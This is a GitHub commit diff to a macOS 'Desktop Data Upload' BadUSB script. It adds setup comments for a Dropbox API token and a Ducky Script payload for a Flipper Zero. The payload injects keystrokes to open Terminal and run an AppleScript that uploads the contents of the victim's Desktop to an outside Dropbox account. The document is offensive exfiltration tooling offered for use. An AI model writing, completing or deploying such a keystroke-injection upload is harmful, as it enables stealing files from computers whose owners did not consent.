Update Desktop Data Upload .txt

This commit is contained in:
Narsty
2023-05-14 17:48:18 -05:00
committed by GitHub
parent 87164a22cd
commit 4fb2e0fe28
+25
View File
@@ -2,6 +2,9 @@ REM Author: Narsty
REM Title: Desktop Data Upload
REM Version 1.0 MacOs
REM Copy and paste this script/code into the text editor
REM Replace the "Your API token Here" placeholder with your actual Dropbox API token
REM Save this script below as a .scpt file (you can use Script Editor) to your desktop.
osascript -e 'tell application "Script Editor"
@@ -16,5 +19,27 @@ osascript -e 'tell application "Script Editor"
do shell script uploadScript
end tell'
REM Title: Desktop Data Upload Execution Script
REM Version 1.0 MacOs
REM Save the below Ducky Script as a .txt file (main Read.me has step by step directions)
REM and put the .txt on your flipper zero to execute the osascript through the terminal.
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING cd ~/Desktop
ENTER
DELAY 500
STRING osascript DTDUpload.scpt
ENTER